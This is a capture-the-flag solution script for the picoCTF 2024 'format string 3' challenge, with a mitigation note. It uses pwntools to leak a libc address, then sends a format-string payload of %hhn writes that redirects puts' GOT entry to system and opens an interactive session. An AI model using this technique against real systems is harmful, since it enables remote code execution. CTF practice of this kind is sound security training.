
pico2024 format string 3


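# Uses a printf format string vulnerability to change the GOT.PLT entry for
# puts to point to system instead (picoCTF 2024 "format string 3" writeup).
#
# Mitigation note: the overwrite only works because the binary's GOT is still
# writable when printf runs. Linking with full RELRO (-Wl,-z,relro,-z,now) makes
# the GOT read-only after loading, and passing user input as a printf *argument*
# ("%s", buf) rather than as the format string (-Wformat-security catches the
# latter) removes the %n write primitive altogether.
from pwn import *

r = remote('rhea.picoctf.net', 64525)
print(r.recvuntil('libc: '))

## receive the address of setvbuf
setvbuf_addr = r.recvline()
print(setvbuf_addr)

# The leaked line is hex text with a trailing newline; parse it once.
leaked = int(setvbuf_addr[:-1], 16)

## split out the second and third bytes (counting from right end)
second_byte = (leaked // 256) % 256
print("second_byte is:" + hex(second_byte))
# 0xa3 is presumably setvbuf's second byte in the reference libc the author
# worked from; the difference is applied to the target address below.
second_diff = second_byte - 0xa3
third_byte = (leaked // (256 * 256)) % 256
print("third_byte is:" + hex(third_byte))

## to minimize # of bytes, write third byte, then first byte, then second
## bottom bytes are 0xf760
## third byte should be value of setvbuf's third byte, minus 3
prefix = "%03d" % (third_byte - 3)

# second byte written is least significant
# we just want this to change to 0x60, 0x160 is used to make
# sure value is positive and extra 0x100 is removed by %256
## Since %hhn is number of bytes written so far, we subtract that
second_amount = (0x160 - (third_byte - 3)) % 256
secondfix = "%03d" % second_amount

## third byte written is second-least significant
## we want this to be f7+whatever difference we discovered from setvbuf
## We know num bytes written so far is 0x60, so we subtract that
third_amount = (0x1f7 - 0x60 + second_diff) % 256
thirdfix = "%03d" % third_amount

## printf probably uses a 512 byte buffer
# Total characters printf will emit before the last %hhn; the original page
# had the comparison operator mangled into an HTML entity ("&gt").
total_written = second_amount + third_amount + third_byte - 3
print(total_written)
if total_written > 512:
    print("Probably gonna fail!")

# Three single-byte %hhn writes. The positional indices 43-45 presumably select
# the three little-endian 8-byte addresses appended at the end of the payload.
fmt = "%" + prefix + "u%43$hhn%" + secondfix + "u%45$hhn%" + thirdfix + "u%44$hhnYYYY"
print(fmt)
print(len(fmt))
# Author's diagnostic variant: same layout with %llx in place of %hhn, which
# prints the selected stack slots instead of writing through them.
#r.sendline("%" + prefix + "u%43$llx%"+secondfix+"u%45$llx%"+thirdfix+"u%44$llxYYYY\x1a\x40\x40\x00\x00\x00\x00\x00\x19\x40\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00")
r.sendline(fmt + "\x1a\x40\x40\x00\x00\x00\x00\x00\x19\x40\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00")
r.interactive()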

